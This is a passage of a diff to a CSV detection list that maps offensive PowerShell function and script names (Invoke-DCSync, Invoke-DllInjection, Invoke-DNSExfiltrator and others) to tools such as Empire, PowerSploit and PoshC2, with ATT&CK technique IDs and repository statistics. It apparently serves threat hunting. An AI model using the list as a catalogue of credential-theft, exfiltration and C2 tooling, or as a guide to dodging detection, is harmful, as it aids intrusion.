that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialInjection.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CredentialsPhish*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-DAFT.*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*invoke-daisychain*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCOM.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1091","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*invoke-dcompayload*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-DCSync*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DefenderExclusionsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DinvokeKatz*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-DllHijackingCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-DllHijackingCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DllInjection*","offensive_tool_keyword","empire","empire script function. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DllInjection*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-DNSExfiltrator*","offensive_tool_keyword","DNSExfiltrator","DNSExfiltrator allows for transfering (exfiltrate) a file over a DNS request covert channel. This is basically a data leak testing tool allowing to exfiltrate data over a covert channel.","T1041 - T1048","TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/Arno0x/DNSExfiltrator","1","1","N/A","10","8","792","189","2019-10-06T22:24:55Z","2017-12-20T13:58:09Z" -"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" -"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-DNSUpdate.ps1*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*Invoke-DomainHarvest*","offensive_tool_keyword","MailSniper","Invoke-DomainHarvest* will attempt to connect to an * portal and determine a valid domain name for logging into the portal","T1595 T1114 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainHarvestOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-DomainPasswordSpray*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-DOSfuscation*","offensive_tool_keyword","Invoke-DOSfuscation","Invoke-DOSfuscation is a PowerShell v2.0+ compatible cmd.exe command obfuscation framework. (White paper: https://www.fireeye.com/blog/threat-research/2018/03/dosfuscation-exploring-obfuscation-and-detection-techniques.html)","T1027 - T1140 - T1059","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-DOSfuscation","1","1","N/A","N/A","8","744","129","2018-03-27T12:16:18Z","2018-03-19T16:47:54Z" -"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-DriverCoInstallersCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-DumpOWAMailboxViaMSGraphApi*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*invoke-edrchecker*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-EDRChecker.ps1*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Invoke-EgressCheck*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-EgressCheck.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1141","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Empire *","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*Invoke-Empire*","offensive_tool_keyword","empire","empire function name of agent.ps1. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 